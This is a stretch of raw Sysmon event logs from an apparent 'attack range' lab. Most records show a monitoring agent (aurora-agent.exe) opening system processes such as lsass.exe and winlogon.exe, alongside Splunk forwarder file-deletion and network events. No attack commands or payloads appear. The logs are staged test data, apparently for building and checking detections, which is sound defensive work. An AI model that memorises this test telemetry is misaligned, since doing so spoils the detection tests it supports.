Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016999Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.733{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016998Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.731{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016997Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016996Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.726{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016995Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.720{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016994Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016993Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016992Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.700{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016991Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016990Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.683{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016989Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.680{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016988Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.661{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016987Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.654{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016986Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016985Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.625{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016984Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.614{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016983Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.580{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016982Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.574{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016981Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.567{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016980Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.558{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016979Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016978Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.543{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016977Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.534{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016976Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.531{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 23542300x800000000000000016975Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.474{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A06691CBC01AF319FB9845C9947EAD7,SHA256=B0D9B1C8C4B1669C37BDA2D7EC127CEE381E9071EBF3B6FDCCEFB4CC9600BC1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:42.559{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CE6C29C24F35707E0343FA6BD302926,SHA256=1E2D2F555CA97655617C5D903B31A1FC0E4C19A52F6D0C8D7E92B38490AC7171,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:39.692{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56378-false10.0.1.12-8000- 23542300x800000000000000044258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.778{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E52909979960DCBD1560D08E315633D4,SHA256=26002ECF1FDB58D0D33AFFC31187E180CE753EDF51D3FC7D6B49EC8CD39B7544,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017008Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.016{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50116-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017007Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:43.734{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C5C20DF060FCD97DE9CD3903B0AC21C,SHA256=9ACD51CF7E1785A0856B6700E6684A5B01F615B2DBE052F720F3245F9BE4D817,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 